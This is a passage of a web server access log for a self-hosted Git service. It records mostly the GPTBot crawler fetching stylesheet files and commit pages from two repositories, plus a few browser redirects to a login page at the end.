"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" +[17/Feb/2026:19:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10119] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" +[17/Feb/2026:19:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" +[17/Feb/2026:19:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10171] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10071] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" +[17/Feb/2026:19:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css/style.css" [Client 74.7.227.38] [Length 12661] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/css" +[17/Feb/2026:19:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css" [Client 74.7.227.38] [Length 12629] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css" +[17/Feb/2026:19:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:19:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10105] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" +[17/Feb/2026:19:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css" [Client 74.7.227.38] [Length 13088] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css" +[17/Feb/2026:19:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:19:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css" [Client 74.7.227.38] [Length 1060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" +[17/Feb/2026:19:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css" [Client 74.7.227.38] [Length 12659] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css" +[17/Feb/2026:19:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css" [Client 74.7.227.38] [Length 13117] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css" +[17/Feb/2026:19:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10112] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" +[17/Feb/2026:19:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9839] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" +[17/Feb/2026:19:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 10144] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" +[17/Feb/2026:19:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10102] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" +[17/Feb/2026:19:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10132] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets" +[17/Feb/2026:19:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" +[17/Feb/2026:19:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css/style.css" [Client 74.7.227.38] [Length 14462] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/css" +[17/Feb/2026:19:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10108] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" +[17/Feb/2026:19:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css" [Client 74.7.227.38] [Length 21527] [Gzip 6.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:19:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 74.7.227.38] [Length 18466] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:19:55:26 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" +[17/Feb/2026:19:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 20053] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 9904] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css/style.css" [Client 74.7.227.38] [Length 20086] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" +[17/Feb/2026:19:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css" [Client 74.7.227.38] [Length 10100] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css" +[17/Feb/2026:19:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/css" +[17/Feb/2026:19:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13195] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css" +[17/Feb/2026:19:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" +[17/Feb/2026:19:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/swagger.css?v=1.25.3" [Client 74.7.227.38] [Length 23395] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/api/swagger" +[17/Feb/2026:19:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" +[17/Feb/2026:19:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 74.7.227.38] [Length 20586] [Gzip 15.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" +[17/Feb/2026:19:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 74.7.227.38] [Length 6358] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" +[17/Feb/2026:19:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13165] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/css" +[17/Feb/2026:19:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13195] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" +[17/Feb/2026:19:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13197] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/css" +[17/Feb/2026:19:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13194] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" +[17/Feb/2026:19:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13201] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" +[17/Feb/2026:19:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13193] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" +[17/Feb/2026:19:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fstyle.css.justbefore" [Client 74.7.227.38] [Length 27164] [Gzip 9.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" +[17/Feb/2026:19:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13193] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/css" +[17/Feb/2026:19:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13193] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" +[17/Feb/2026:19:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13194] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" +[17/Feb/2026:19:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:19:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css/style.css" [Client 74.7.227.38] [Length 13115] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/css" +[17/Feb/2026:19:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" +[17/Feb/2026:19:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore?display=source" [Client 74.7.227.38] [Length 18483] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" +[17/Feb/2026:21:30:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[17/Feb/2026:21:30:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 